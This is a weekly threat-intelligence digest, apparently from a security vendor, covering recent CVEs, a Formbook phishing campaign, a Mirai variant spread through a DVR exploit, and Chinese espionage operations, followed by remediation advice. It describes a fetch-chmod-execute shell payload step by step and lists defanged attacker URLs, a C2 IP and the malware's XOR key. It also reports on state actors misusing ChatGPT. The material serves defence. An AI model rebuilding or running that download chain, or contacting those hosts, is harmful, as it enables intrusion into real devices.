Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Google Patches Actively Exploited Chrome Vulnerability Tracked as CVE-2025-5419 - On June 2, 2025, Google patched CVE-2025-5419, an actively exploited high-severity vulnerability affecting its Chrome web browser. Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoît Sevens first disclosed and reported CVE-2025-5419 to Google on May 27, 2025. The update also patched CVE-2025-5068, a medium-severity vulnerability with no known exploitation at the time of writing.
- CVE-2025-5419 is an out-of-bounds read and write flaw in Chrome’s V8 JavaScript engine. Successful exploitation allows threat actors to trigger heap corruption via a maliciously crafted HTML page, potentially leading to remote code execution (RCE).
- CVE-2025-5068 is a use-after-free flaw in Chrome’s Blink rendering engine. Successful exploitation allows threat actors to trigger heap corruption via a maliciously crafted HTML page, potentially leading to RCE.
Cisco Patches Three ISE and CCP Vulnerabilities With No Active Exploitation Reported - On June 4, 2025, Cisco patched CVE-2025-20286, CVE-2025-20129, and CVE-2025-20130, three vulnerabilities affecting its Identity Services Engine and Customer Collaboration Platform. Cisco confirmed that proof-of-concept (PoC) exploits were available for these vulnerabilities but found no evidence of active exploitation at the time of writing.
- CVE-2025-20286 is a static credential flaw in Cisco Identity Services Engine (ISE) when deployed in Amazon Web Services (AWS), Microsoft Azure, or Oracle Cloud Infrastructure (OCI). The flaw stems from improper generation of credentials in these environments. Successful exploitation allows threat actors to extract credentials from one cloud deployment and access other ISE instances, potentially leading to unauthorised data access, executing administrative commands, configuration changes, or denial-of-service (DoS) conditions.
- CVE-2025-20129 is an information disclosure flaw in the web-based chat interface of Cisco CCP caused by improper handling of HTTP requests. Successful exploitation allows threat actors to gain unauthorised access to sensitive data by redirecting chat traffic.
- CVE-2025-20130 is an improper access control flaw in the API of Cisco ISE and Cisco ISE Passive Identity Connector (ISE-PIC) caused by insufficient file upload verification. Successful exploitation allows threat actors with administrative privileges to upload arbitrary files to the system.
Qualcomm Patches Three Adreno GPU Vulnerabilities Exploited in Limited Attacks - On June 2, 2025, Qualcomm Technologies, Inc. patched three n-day vulnerabilities (CVE-2025-21479, CVE-2025-21480, and CVE-2025-27038) in the Adreno Graphics Processing Unit (GPU) driver. Google Threat Analysis Group has detected limited exploitation activity involving these vulnerabilities. The following outlines the technical details of these vulnerabilities:
- CVE-2025-21479 and CVE-2025-21480 are critical-severity incorrect authorisation vulnerabilities in Adreno GPU. Successful exploitation could allow threat actors to corrupt memory by running unauthorised commands in the GPU micronode.
- CVE-2025-27038 is a high-severity use-after-free vulnerability in Adreno GPU. Successful exploitation could allow threat actors to corrupt memory during graphics rendering in Chrome.
Potential Threats
Threat Actors Exploit CVE-2017-0199 via Malicious Excel Attachments in Phishing Campaign to Deploy Formbook - On June 5, 2025, Fortinet reported a phishing campaign targeting Microsoft Windows users running Microsoft Office 2007 SP3, 2010 SP2, 2013 SP1, or 2016. Threat actors reportedly sent emails impersonating sales orders, using malicious Excel attachments to exploit CVE-2017-0199, a remote code execution vulnerability in Office’s Object Linking and Embedding (OLE) functionality. Threat actors aimed to deploy Formbook, malware designed to steal keystrokes, clipboard contents, and login credentials from vulnerable systems.
Threat Actors Exploit CVE-2024-3721 to Deliver a New Mirai Variant to DVR Devices
- On June 6, 2025, Kaspersky Securelist published an analysis detailing a new Mirai variant delivered through the exploitation of CVE-2024-3721. CVE-2024-3721 is an unauthenticated remote code execution (RCE) vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recorder (DVR) devices running firmware versions up to 20240412.
Based on Kaspersky Securelist’s technical blog, the “/device.rsp” endpoint of their honeypot service received a malicious HTTP POST request exploiting CVE-2024-3721. The POST request includes a single-line shell script that performs the following actions on a Linux machine:
- Accesses the /tmp directory
- Removes any existing binary named “arm7”
- Downloads a binary named “arm7” from the URL hxxp://42.112.26[.]36/arm7
- Grants arm7 full permissions
- Executes arm7
Kaspersky Securelist identified arm7 as a new Mirai variant designed for ARM32 DVR architecture. According to Kaspersky Securelist, the new Mirai variant employs string encryption using the RC4 algorithm for obfuscation. Once executed, it performs anti-virtualisation and anti-emulation checks by scanning the /proc directory and identifying processes related to VMware or QEMU-arm. It also verifies whether the binary runs from a hard-coded directory list. Once the system passes all these checks, the new Mirai variant launches its full functionality and connects to its command-and-control (C2) server to receive further instructions.
Chinese State-Sponsored Campaigns, ShadowPad and PurpleHaze, Target Over 70 Global Organisations - On June 9, 2025, SentinelLabs reported two cyber espionage operations tracked as ShadowPad and PurpleHaze, attributed with high confidence to Chinese state-sponsored threat actors. These operations targeted over 70 organisations globally across sectors such as government, finance, manufacturing, and media, including attempted reconnaissance targeting SentinelOne.
General News
OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation - OpenAI recently revealed that state-backed threat actors from countries like China, Russia, North Korea, Iran, and the Philippines have been misusing ChatGPT for malicious purposes.
These include refining malware, spreading disinformation on social media, and conducting employment scams. For instance, actors in China and Russia used ChatGPT to generate political content in various languages for covert influence operations on platforms like X, Reddit, and Facebook, while North Korean operatives created fake resumes and personas to secure remote jobs and gain access to sensitive systems. The company has since banned the involved accounts and shared relevant data with partners.
The report also uncovered how hackers from groups like APT5 and APT15 used ChatGPT to assist in cyberattacks, including brute-force scripting and social media automation. A malware named “ScopeCreep,” linked to Russian actors, was developed using ChatGPT and targeted video game players.
UK tax authority reveals scammers stole £47 million - Scammers stole £47 million ($63 million) from the UK’s HM Revenue and Customs (HMRC) last year by fraudulently claiming tax rebates intended for regular taxpayers. Around 100,000 people had their accounts affected, and HMRC is now contacting them by letter. Fortunately, no individuals will face personal financial loss, as the stolen funds came from HMRC, and affected accounts have been locked.
HMRC officials told Parliament that the agency itself wasn’t hacked. Instead, attackers used personal data obtained through phishing or malware (like infostealers) to hijack or create fake accounts. While £47 million was lost in this particular scam, HMRC successfully blocked £1.9 billion in other fraudulent attempts. A criminal investigation is ongoing, and arrests have already been made.
Microsoft makes a 'proactive investment' in EU cybersecurity amid bloc's tensions with US
- Microsoft has launched a new European Security Program to provide free AI-powered threat intelligence to European governments, similar to what it already offers the U.S. The program aims to boost digital sovereignty and cybersecurity across the EU, its candidate countries, and several non-EU states like the UK, Switzerland, and Norway.
It includes embedding experts at Europol, supporting NGOs, investing in AI security research, and offering targeted guidance on vulnerabilities.
The initiative comes amid growing tensions between Europe and the U.S., with Microsoft promising to resist any U.S. orders to shut down its European cloud operations. It also follows criticism over Microsoft’s past security lapses, including breaches by Russian and Chinese hackers. Microsoft says the move reflects a long-term commitment to Europe’s digital future and will involve sharing AI tools used by its security teams to counter persistent nation-state and cybercriminal threats.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| Gunra Ransomware Group | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 30 |
| UNC6040 | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 30 |
| 303 | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 25 |
| mila | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ●5 |
| Global Ransomware Group | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ●5 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions,
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | ||||
|---|---|---|---|---|---|---|---|
| NightSpire Ransomware Group | ▲ |
PathWiper |
▲ | CVE-2024-3721 | ▲ |
Yes24 Co., Ltd. |
▲ |
|
Arkana Ransomware Group |
▲ |
Mirai |
▲ | CVE-2025-32756 | ▲ |
X. |
▲ |
|
RipperSec |
▲ |
C&C Server |
▲ | CVE-2025-49113 | ▲ |
UNFI |
▲ |
|
RansomHouse Group |
▲ |
T1021 (Remote Services) |
▲ | CVE-2025-5419 | ▲ |
Veeam Backups |
▲ |
|
Chinese Hackers |
▲ |
PLUSINJECT |
▲ |
CVE-2017-0199 |
▲ |
Optima Tax Relief |
▲ |
Prominent Information Security Events
Threat Actors Exploit CVE-2017-0199 via Malicious Excel Attachments in Phishing Campaign to Deploy Formbook
Source: Insikt Group | Validated Intelligence Event
IOC: SHA256 - 7e16ed31277c31c0370b391a1fc73f77d7f0cd13cc3bab0eaa9e2f303b6019af
IOC: SHA256 - 2bfbf6792ca46219259424efbbbee09ddbe6ae8fd9426c50aa0326a530ac5b14
IOC: URL - hxxps://agr[.]my/P6bJNr
On June 5, 2025, Fortinet reported a phishing campaign targeting Microsoft Windows users running Microsoft Office 2007 SP3, 2010 SP2, 2013 SP1, or 2016. Threat actors reportedly sent emails impersonating sales orders, using malicious Excel attachments to exploit CVE-2017-0199, a remote code execution vulnerability in Office’s Object Linking and Embedding (OLE) functionality. Threat actors aimed to deploy Formbook, malware designed to steal keystrokes, clipboard contents, and login credentials from vulnerable systems.
When opened on a vulnerable system, the Excel file exploits CVE-2017-0199 to fetch and execute a malicious HTML Application (HTA) file via mshta.exe. The HTA script contains base64-encoded content that, when decoded, downloads and writes an executable named sihost.exe to the %APPDATA% directory. This AutoIt-compiled executable includes an encrypted payload stored in a resource section labeled “SCRIPT.”
The malware uses the IsDebuggerPresent API to check for debugging, and if no debugger is detected, it decrypts the SCRIPT resource using a hard-coded XOR key (3NQXSHDTVT2DPK06) and extracts a component named “springmaker” to the %TEMP% directory. It executes the decrypted content from memory using the CallWindowProc API, ultimately launching 'Formbook' malware.
Chinese State-Sponsored Campaigns, ShadowPad and PurpleHaze, Target Over 70 Global Organisations
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 107[.]173[.]111[.]26
IOC: URL - downloads[.]trendav[.]vip
IOC: URL - epp[.]navy[.]ddns[.]info
IOC: URL - mail[.]ccna[.]organiccrap[.]com
On June 9, 2025, SentinelLabs reported two cyber espionage operations tracked as ShadowPad and PurpleHaze, attributed with high confidence to Chinese state-sponsored threat actors. These operations targeted over 70 organisations globally across sectors such as government, finance, manufacturing, and media, including attempted reconnaissance targeting SentinelOne.
Threat actors often gained initial access by exploiting vulnerabilities CVE-2024-8963 and CVE-2024-8190 in Ivanti Endpoint Manager Cloud Services Appliance—both previously covered in an Insikt Group Analyst Note (see sources). The threat actors also used the ShadowPad modular backdoor and the GOREshell reverse SSH malware to maintain persistent access.
- In the ShadowPad operation, observed between June 2024 and March 2025, SentinelLabs observed ShadowPad samples loaded via DLL hijacking and communicating with the threat actor’s command-and-control (C2) server. The threat actors also used PowerShell scripts and Nimbo-C2 agents to collect and encrypt sensitive data.
- The PurpleHaze operation, observed between September 2024 and October 2024, used the GOREshell backdoor, deployed using DLL hijacking and obfuscated with Garble, alongside other open-source tools from The Hacker’s Choice (THC) community. SentinelLabs attributed some PurpleHaze operations to Chinese state-sponsored groups overlapping with APT15 and UNC5174.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-5419, CVE-2025-5068: We recommend updating Google Chrome to version 137.0.7151.68/.69 for Windows and Mac, and 137.0.7151.68 for Linux to reduce the risk of exploitation.
- CVE-2025-20286, CVE-2025-20129, and CVE-2025-20130: We recommend updating the affected products to the latest versions provided by the vendor to reduce the risk of exploitation.
- CVE-2025-21479, CVE-2025-21480, CVE-2025-27038: We recommend applying the latest patches on affected devices to reduce the risk of exploitation.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.